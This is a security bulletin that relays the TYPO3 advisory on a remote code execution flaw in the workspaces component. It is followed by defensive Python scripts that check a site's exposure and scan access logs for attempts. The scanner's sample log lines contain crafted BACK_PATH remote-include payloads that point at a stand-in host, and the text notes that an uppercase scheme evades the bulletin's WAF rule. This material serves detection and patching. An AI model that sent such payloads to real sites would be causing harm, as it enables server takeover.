ESB-2012.0028 - ALERT [Win][UNIX/Linux] TYPO3: Execute arbitrary code/commands - Remote with user interaction
06 January 2012
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2012.0028
                   Remote Code Execution in TYPO3 Core
                              6 January 2012

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           TYPO3
Publisher:         TYPO3
Operating System:  Windows
                   UNIX variants (UNIX, Linux, OSX)
Impact/Access:     Execute Arbitrary Code/Commands -- Remote with User Interaction
Resolution:        Patch/Upgrade

Original Bulletin:
  http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2011-004/

Comment: Please note this vulnerability is being actively exploited.

- --------------------------BEGIN INCLUDED TEXT--------------------

TYPO3 Security Bulletin TYPO3-CORE-SA-2011-004: Remote Code Execution in TYPO3 Core

Component Type:      TYPO3 Core
Affected Versions:   4.5.0 up to 4.5.8, 4.6.0 and 4.6.1 (+ development releases of 4.7 branch)
Vulnerability Types: Remote Code Execution
Overall Severity:    Critical
Release Date:        December 16, 2011

Vulnerable subcomponent: TYPO3 workspaces
Vulnerability Type:      Remote Code Execution
Severity:                Critical
Suggested CVSS v2.0:     AV:N/AC:M/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C

Problem Description:

A PHP file which is part of the workspaces system extension does not validate
passed arguments. You are only vulnerable if all of the following conditions
are met:

  * You are using TYPO3 version 4.5.0 up to 4.5.8, 4.6.0 or 4.6.1
    (+ development releases of 4.7 branch).
  * You have all of the following PHP configuration variables set to "on":
    register_globals ("off" by default, advised to be "off" in the TYPO3
    Security Guide), allow_url_include ("off" by default) and
    allow_url_fopen ("on" by default).

If you are using the Suhosin PHP extension you are only vulnerable if you
have additionally put URL schemes in the configuration variable
"suhosin.executor.include.whitelist".

The workspaces system extension does not need to be activated for this
vulnerability to exist.

Possible Impact:

A crafted request to a vulnerable TYPO3 installation will allow an attacker
to load PHP code from an external source and to execute it on the TYPO3
installation.

Solution:

You can choose one of the solutions below:

  * Update to TYPO3 version 4.5.9 or 4.6.2, which fix the problem described.
  * Set at least one of the following PHP configuration variables to "off":
    register_globals, allow_url_include or allow_url_fopen.
  * Apply the patch that is linked below.
  * Set up a mod_security rule:

      SecRule ARGS:BACK_PATH "^(https?|ftp)" "deny"

Patch: Patch for TYPO3 version 4.5.x and 4.6.x
(md5 sum: 3779a884b87b93b874b8a21330f43533); see "how to patch" on the
original bulletin page.

Note: We have been informed that this vulnerability is already the target of
mass exploitation attempts.

Credits: Credits go to Björn Pedersen and Christian Toffolo, who discovered
and reported the issue, and to Security Team member Helmut Hummel for
providing the patch.

General Advice: Follow the recommendations that are given in the TYPO3
Security Guide. Please subscribe to the typo3-announce mailing list.

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If you
do not know who that is, please send an email to
firstname.lastname@example.org and we will forward your request to the
appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your
organisation's site policies and procedures. AusCERT takes no responsibility
for consequences which may arise from following or acting on information or
advice contained in this security bulletin.

NOTE: This is only the original release of the security bulletin. It may not
be updated when updates to the original are made. If downloading at a later
date, it is recommended that the bulletin is retrieved directly from the
author's website to ensure that the information is still current.

Contact information for the authors of the original document is included in
the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:
        http://www.auscert.org.au/render.html?cid=1980

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: email@example.com
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBTwZACO4yVqjM2NGpAQJIZA/9HMUodFWJiEBM3TZuzVWZiVjZS26F8MxF
mWo6KTE17NL1F2fi+4xuY3vnWZnA+RB+QnKxWfuuzZOj9+TG8v5LvNc+DWYMDLw9
WvVNfzeU9FqbuMrCFAuljyqpnFfuQHf0nPWxmZ84Yl3d+Mrgugm6K8Hep6VbsyKq
5PHXnbrM1iu2UN1fI7Gby7DcwsIsCbj0alV4syr4n6dhSQujeD8K9XqEhOLUABYC
tnjHm7GA0VVTHbyood6kgJwlu+7y2avOhQ+ZUvNXNKEoeGevVod8U/UMRKiliOuU
Gv//oslUrouEUbbnczamXMRTVwRa6KQmH4DOdAMIRSp5UNkD9RVI/01w2ljhlePU
QS9Vwds6SnbT2O+1TOtC8Cix+bvxQoBMGj7C1HCKr9pByeZtQnLYl3ScP6Vqke3z
4nz7AwA1vrUCk5QBZ35AYKXhBxA9+LXZ+5RCO8HUBmI5v5bwhKQSare427/gXFKN
HECl6fqqD4gJSNW5BQzkgjEZuPkohn4lRO3TSzce/Hd/4NkB2AOOITeYnrXPzE/q
glhA2E7bFg1qFRV37ft00oVER1epYTR40boPfbVQZUgAvbkFDEi6KOGU4JhRWb1l
u7COYwzLYTRT6dom0Rsltv+PQkx2xmcLhfnQ+ZnWhQqfsalkS2TqN/mTF3x4kfJf
6zRx7c7YLx4=
=3Yvo
-----END PGP SIGNATURE-----
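The bulletin's "you are only vulnerable if all of the following conditions are met" is a conjunction of a version range and three php.ini booleans, with an extra Suhosin clause. The script below (an added example, not code from AusCERT or the TYPO3 project) encodes those conditions so they can be checked against a site's `php -i` or `ini_get()` values. The version parser, the `ini_on()` truth rules and the sample configurations are assumptions made for the example; only the affected ranges, the three directives and the Suhosin whitelist condition come from the bulletin.

```python
"""Exposure check for TYPO3-CORE-SA-2011-004 (added example, not TYPO3's own code)."""
import re

# First fixed patch level per affected branch, per the bulletin: 4.5.9 and 4.6.2.
FIRST_FIXED = {(4, 5): 9, (4, 6): 2}

# Suhosin clause: vulnerable only if URL schemes were added to the include whitelist.
URL_SCHEMES = {"http", "https", "ftp"}

# Assumed version syntax: '4.5.8', '4.7-dev', '4.7.0beta1'.
VERSION_RE = re.compile(
    r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-?(dev|alpha|beta|rc)\w*)?$", re.IGNORECASE)


def parse_version(version):
    """Return (major, minor, patch, is_prerelease)."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError("unrecognised TYPO3 version string: %r" % version)
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0), m.group(4) is not None


def version_affected(version):
    """True for 4.5.0-4.5.8, 4.6.0-4.6.1 and 4.7 pre-release builds."""
    major, minor, patch, prerelease = parse_version(version)
    if major != 4:
        return False
    if (major, minor) in FIRST_FIXED:
        return patch < FIRST_FIXED[(major, minor)]
    # 4.7 existed only as development releases when the bulletin was issued;
    # treating every 4.7 pre-release as affected is the conservative reading.
    return minor == 7 and prerelease


def ini_on(value):
    """PHP accepts 1/On/True/Yes (any case) as 'on' for boolean ini settings."""
    return str(value).strip().lower() in ("1", "on", "true", "yes")


def assess(version, ini, suhosin_loaded=False):
    """Apply the bulletin's conditions literally.

    `ini` maps php.ini directive names to their string values.  Returns
    (vulnerable, unmet): `unmet` lists every condition that does NOT hold,
    so an empty list means the installation is exposed.
    """
    unmet = []
    if not version_affected(version):
        unmet.append("TYPO3 %s is outside the affected range" % version)
    for directive in ("register_globals", "allow_url_include", "allow_url_fopen"):
        if not ini_on(ini.get(directive, "")):
            unmet.append("%s is off" % directive)
    if suhosin_loaded:
        whitelist = {s.strip().lower()
                     for s in ini.get("suhosin.executor.include.whitelist", "").split(",")}
        if not whitelist & URL_SCHEMES:
            unmet.append("Suhosin is loaded and its include whitelist has no URL scheme")
    return (not unmet), unmet


# Constructed sample configurations (not taken from any real installation).
ALL_ON = {"register_globals": "On", "allow_url_include": "On", "allow_url_fopen": "On"}
DEFAULTS = {"register_globals": "Off", "allow_url_include": "Off", "allow_url_fopen": "On"}

if __name__ == "__main__":
    for ver, ini, suhosin in (("4.5.8", ALL_ON, False),
                              ("4.5.8", DEFAULTS, False),
                              ("4.6.1", ALL_ON, True),
                              ("4.6.2", ALL_ON, False)):
        vulnerable, why = assess(ver, ini, suhosin)
        print(ver, "VULNERABLE" if vulnerable else "not vulnerable:", "; ".join(why))
```

The `unmet` list is the useful output: a site on 4.5.8 with stock php.ini defaults is reported as not vulnerable because `register_globals` and `allow_url_include` are off, which is exactly the second remediation the bulletin offers. Turning any one of the three directives off is enough, but upgrading to 4.5.9 or 4.6.2 removes the unvalidated argument itself rather than relying on PHP configuration staying that way.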
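The mod_security rule in the Solution section, `SecRule ARGS:BACK_PATH "^(https?|ftp)" "deny"`, names the parameter that carries the remote include. The scanner below (an added example, not part of the bulletin) mirrors that rule over web-server access logs so that past exploitation attempts can be found, and also applies a broadened check. Two caveats a practitioner should keep in mind, both reflected in the code: the rule's regex is case-sensitive, while PHP's stream wrapper lookup falls back to a lower-cased scheme name, so a value starting with `HTTP://` passes the rule but still reaches a URL wrapper; and an access log only shows GET query strings, whereas `ARGS` also covers POST bodies, so a clean log does not prove no attempt was made. The log lines, paths and addresses are constructed (TEST-NET ranges); the broadened scheme list and the hypothetical path `/typo3/index.php` are assumptions, not the vulnerable file named by the bulletin.

```python
"""Find BACK_PATH remote-include attempts in access logs (added example, not from the bulletin)."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/NCSA combined-format prefix: client, ident, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# What the bulletin's mod_security rule tests: the decoded BACK_PATH value
# begins with http, https or ftp (case-sensitive, no colon required).
RULE_RE = re.compile(r"^(https?|ftp)")

# Broadened check (assumption, not part of the bulletin): any letter case, plus
# other wrappers that allow_url_include also gates (ftps, data:, php://input).
BROAD_RE = re.compile(r"^(https?|ftps?|data|php):", re.IGNORECASE)


def check_target(target):
    """Inspect one request target; returns (rule_hit, broad_hit, back_path_values).

    Only an exact-case BACK_PATH parameter is considered, because
    register_globals creates $BACK_PATH from a parameter of exactly that name.
    """
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("BACK_PATH", [])
    rule_hit = any(RULE_RE.match(v) for v in values)
    broad_hit = any(BROAD_RE.match(v) for v in values)
    return rule_hit, broad_hit, values


def scan_log(lines):
    """Return one record per request whose BACK_PATH matches either check."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        rule_hit, broad_hit, values = check_target(m.group("target"))
        if rule_hit or broad_hit:
            hits.append({"ip": m.group("ip"), "path": urlsplit(m.group("target")).path,
                         "values": values, "rule": rule_hit, "broad": broad_hit})
    return hits


# Constructed log lines (TEST-NET addresses; paths are illustrative, not the vulnerable file).
SAMPLE_LOG = [
    '198.51.100.9 - - [06/Jan/2012:09:12:01 +1000] "GET /typo3/index.php?BACK_PATH=../ HTTP/1.1" 200 4410 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [06/Jan/2012:09:12:05 +1000] "GET /typo3/index.php?BACK_PATH=http%3A%2F%2F203.0.113.5%2Fx.txt HTTP/1.1" 200 132 "-" "curl/7.21"',
    '203.0.113.7 - - [06/Jan/2012:09:12:06 +1000] "GET /typo3/index.php?BACK_PATH=HTTP%3A%2F%2F203.0.113.5%2Fx.txt HTTP/1.1" 200 132 "-" "curl/7.21"',
    '203.0.113.7 - - [06/Jan/2012:09:12:07 +1000] "GET /typo3/index.php?BACK_PATH=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CaGVsbG8%3D HTTP/1.1" 200 132 "-" "curl/7.21"',
    '203.0.113.7 - - [06/Jan/2012:09:12:08 +1000] "POST /typo3/index.php HTTP/1.1" 200 132 "-" "curl/7.21"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

On the sample, the lowercase `http://` request is caught by both checks, the `HTTP://` and `data://` requests only by the broadened one, and the POST is invisible to log scanning altogether. If the mod_security rule is used as the stop-gap rather than one of the php.ini changes, the same widening can be applied at the WAF by lower-casing the value before matching, for instance `SecRule ARGS:BACK_PATH "^(https?|ftps?|data|php):" "t:none,t:lowercase,deny"` (a variant suggested here, not the bulletin's rule).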